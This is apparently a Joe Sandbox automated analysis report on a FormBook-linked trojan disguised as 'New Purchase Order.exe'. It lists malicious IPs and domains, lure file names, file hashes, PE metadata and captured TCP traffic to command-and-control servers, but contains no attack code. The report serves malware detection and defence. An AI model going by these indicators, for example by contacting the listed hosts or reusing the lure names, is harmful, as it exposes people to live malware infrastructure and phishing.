                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 47s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:17
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:New Purchase Order.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@5/4
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 89%
                                                • Number of executed functions: 91
                                                • Number of non-executed functions: 288
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • VT rate limit hit for: New Purchase Order.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                08:40:57API Interceptor1x Sleep call for process: New Purchase Order.exe modified
                                                09:50:23API Interceptor150987x Sleep call for process: isoburn.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                104.21.58.90Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                • www.bser101pp.buzz/v89f/
                                                Quotation.exeGet hashmaliciousFormBookBrowse
                                                • www.bser101pp.buzz/crrp/
                                                payments.exeGet hashmaliciousFormBookBrowse
                                                • www.bser101pp.buzz/crrp/
                                                31.186.11.114Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                        103.224.182.242Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                        • www.madhf.tech/6ou6/
                                                        attached invoice.exeGet hashmaliciousFormBookBrowse
                                                        • www.seeseye.website/ebz6/
                                                        YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                        • www.madhf.tech/0mwe/
                                                        Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                        • www.madhf.tech/3iym/
                                                        Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.madhf.tech/6ou6/
                                                        Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.madhf.tech/6ou6/
                                                        PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                        • www.madhf.tech/3iym/
                                                        Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                        • www.madhf.tech/6ou6/
                                                        Payroll List.exeGet hashmaliciousFormBookBrowse
                                                        • www.klohk.tech/3m3e/
                                                        Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                        • www.madhf.tech/0mwe/
                                                        194.76.119.60Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                        • www.cstrategy.online/qx5d/
                                                        Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.cstrategy.online/qx5d/
                                                        Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.cstrategy.online/qx5d/
                                                        Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                        • www.cstrategy.online/qx5d/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.madhf.techPurchase Order..exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 103.224.182.242
                                                        BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                        • 15.204.67.7
                                                        Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 103.224.182.242
                                                        Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 103.224.182.242
                                                        PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        www.bser101pp.buzzPurchase Order..exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.6
                                                        Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 172.67.158.106
                                                        Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 172.67.158.106
                                                        Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.58.90
                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.58.90
                                                        payments.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.58.90

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSOder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.9
                                                        0200011080.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.6
                                                        Oder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.12.140
                                                        Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.6
                                                        SW_5724.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.156.195
                                                        0200011080.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.6
                                                        Oder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.6
                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.67.152
                                                        72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.218.146
                                                        quotation.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.90.137
                                                        TRELLIAN-AS-APTrellianPtyLimitedAUPurchase Order..exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        attached invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 103.224.182.242
                                                        https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                                        • 103.224.182.206
                                                        Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 103.224.182.242
                                                        Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 103.224.182.242
                                                        kkEzK284oT.exeGet hashmaliciousHTMLPhisherBrowse
                                                        • 103.224.182.206
                                                        http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                        • 103.224.212.217
                                                        BETAINTERNATIONALTRPurchase Order..exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.114
                                                        Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 31.186.11.114
                                                        Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 31.186.11.114
                                                        Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.114
                                                        z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.254
                                                        0nazQxrt5MZ5BRK.exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.254
                                                        z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.254
                                                        z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.254
                                                        #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.254
                                                        #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                        • 31.186.11.254

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Temp\l420377x

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\isoburn.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:modified
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1215420383712111
                                                        Encrypted:false
                                                        SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                        MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                        SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                        SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                        SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.7780199156633865
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:New Purchase Order.exe
                                                        File size:814'080 bytes
                                                        MD5:225b541dd84b7d8cbd7cb719a80e4df9
                                                        SHA1:192a656a280cf136ac1cc91019bf28b057cc7a50
                                                        SHA256:d9984c8e232d51fee8996efff6a296be9fa8f9957435269d0c23e1b1fd4eb061
                                                        SHA512:1a03d5c5e4f74aaa2362652541493c31a021ae6b189d5e3fef5983b3bdc5c0629e3ad1f4ba66fdad970feeb56e41b044d5a483c042a32ff8671a3b6c9cd8633f
                                                        SSDEEP:12288:f7hmIR4R52J+XtmPwzF9ShSdWWpNlkqQ/MWi8IT0YoU4+/awLSdG5DJ4Zf+mSgak:9mIeeUHSAd1pkP/M3LT0yirQWIpuMI
                                                        TLSH:D005F19C3611B15FC90785314E60FCB8AA582DAE9707D313A6DB2EEFBD1D8578E041E2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0......P.......9... ...@....@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:033424c4c199d839

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4c399e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x674EA460 [Tue Dec 3 06:25:36 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc39440x57.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x4ca8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xc19a40xc1a005e8e8f462e9391895ef70f8148c0a15dFalse0.9093871045836023data7.7796093100623445IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc40000x4ca80x4e0081da0f880a16dab606521c6cfc3b6369False0.9410556891025641data7.769002519883347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xca0000xc0x200fd9f7aee487310069b13c9400b2bb006False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc41300x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                        RT_GROUP_ICON0xc882c0x14data1.05
                                                        RT_VERSION0xc88400x278data0.47310126582278483
                                                        RT_MANIFEST0xc8ab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 3, 2024 14:42:07.597717047 CET4983080192.168.2.731.186.11.114
                                                        Dec 3, 2024 14:42:07.717755079 CET804983031.186.11.114192.168.2.7
                                                        Dec 3, 2024 14:42:07.717979908 CET4983080192.168.2.731.186.11.114
                                                        Dec 3, 2024 14:42:07.730643988 CET4983080192.168.2.731.186.11.114
                                                        Dec 3, 2024 14:42:07.851675034 CET804983031.186.11.114192.168.2.7
                                                        Dec 3, 2024 14:42:09.146034956 CET804983031.186.11.114192.168.2.7
                                                        Dec 3, 2024 14:42:09.146066904 CET804983031.186.11.114192.168.2.7
                                                        Dec 3, 2024 14:42:09.146078110 CET804983031.186.11.114192.168.2.7
                                                        Dec 3, 2024 14:42:09.146372080 CET4983080192.168.2.731.186.11.114
                                                        Dec 3, 2024 14:42:09.157381058 CET4983080192.168.2.731.186.11.114
                                                        Dec 3, 2024 14:42:09.277390957 CET804983031.186.11.114192.168.2.7
                                                        Dec 3, 2024 14:42:25.611222982 CET4986680192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:25.731241941 CET8049866194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:25.731332064 CET4986680192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:25.793107033 CET4986680192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:25.913259983 CET8049866194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:27.105839014 CET8049866194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:27.105895996 CET8049866194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:27.106136084 CET4986680192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:27.311933041 CET4986680192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:28.331660986 CET4987380192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:28.451674938 CET8049873194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:28.451986074 CET4987380192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:28.466450930 CET4987380192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:28.586757898 CET8049873194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:29.842113018 CET8049873194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:29.842175961 CET8049873194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:29.842375040 CET4987380192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:29.967958927 CET4987380192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:30.986721039 CET4987980192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:31.106868029 CET8049879194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:31.107140064 CET4987980192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:31.122350931 CET4987980192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:31.242624998 CET8049879194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:31.242639065 CET8049879194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:32.545078993 CET8049879194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:32.545368910 CET8049879194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:32.545432091 CET4987980192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:32.624166965 CET4987980192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:33.643040895 CET4988580192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:33.763125896 CET8049885194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:33.763277054 CET4988580192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:33.772001982 CET4988580192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:33.892038107 CET8049885194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:35.135171890 CET8049885194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:35.135248899 CET8049885194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:35.135417938 CET4988580192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:35.138576031 CET4988580192.168.2.7194.76.119.60
                                                        Dec 3, 2024 14:42:35.261315107 CET8049885194.76.119.60192.168.2.7
                                                        Dec 3, 2024 14:42:40.741859913 CET4990180192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:40.861931086 CET8049901103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:40.862160921 CET4990180192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:40.879669905 CET4990180192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:40.999799013 CET8049901103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:42.138322115 CET8049901103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:42.138714075 CET8049901103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:42.138765097 CET4990180192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:42.389772892 CET4990180192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:43.409077883 CET4990780192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:43.530752897 CET8049907103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:43.530981064 CET4990780192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:43.545677900 CET4990780192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:43.665621996 CET8049907103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:44.890918970 CET8049907103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:44.891031981 CET8049907103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:44.891099930 CET4990780192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:45.061846018 CET4990780192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:46.080791950 CET4991580192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:46.200953960 CET8049915103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:46.201069117 CET4991580192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:46.216057062 CET4991580192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:46.336378098 CET8049915103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:46.336395979 CET8049915103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:47.573178053 CET8049915103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:47.573219061 CET8049915103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:47.573343039 CET4991580192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:47.718161106 CET4991580192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:48.736850977 CET4992280192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:48.859689951 CET8049922103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:48.859826088 CET4992280192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:48.869399071 CET4992280192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:48.990073919 CET8049922103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:50.187536001 CET8049922103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:50.187582016 CET8049922103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:50.187598944 CET8049922103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:50.187808990 CET4992280192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:50.190839052 CET4992280192.168.2.7103.224.182.242
                                                        Dec 3, 2024 14:42:50.311238050 CET8049922103.224.182.242192.168.2.7
                                                        Dec 3, 2024 14:42:55.635374069 CET4993880192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:55.758610964 CET8049938104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:55.758691072 CET4993880192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:55.773456097 CET4993880192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:55.897433996 CET8049938104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:56.965662003 CET8049938104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:56.966456890 CET8049938104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:56.966545105 CET4993880192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:57.280507088 CET4993880192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:58.299601078 CET4994480192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:58.419678926 CET8049944104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:58.419770002 CET4994480192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:58.435972929 CET4994480192.168.2.7104.21.58.90
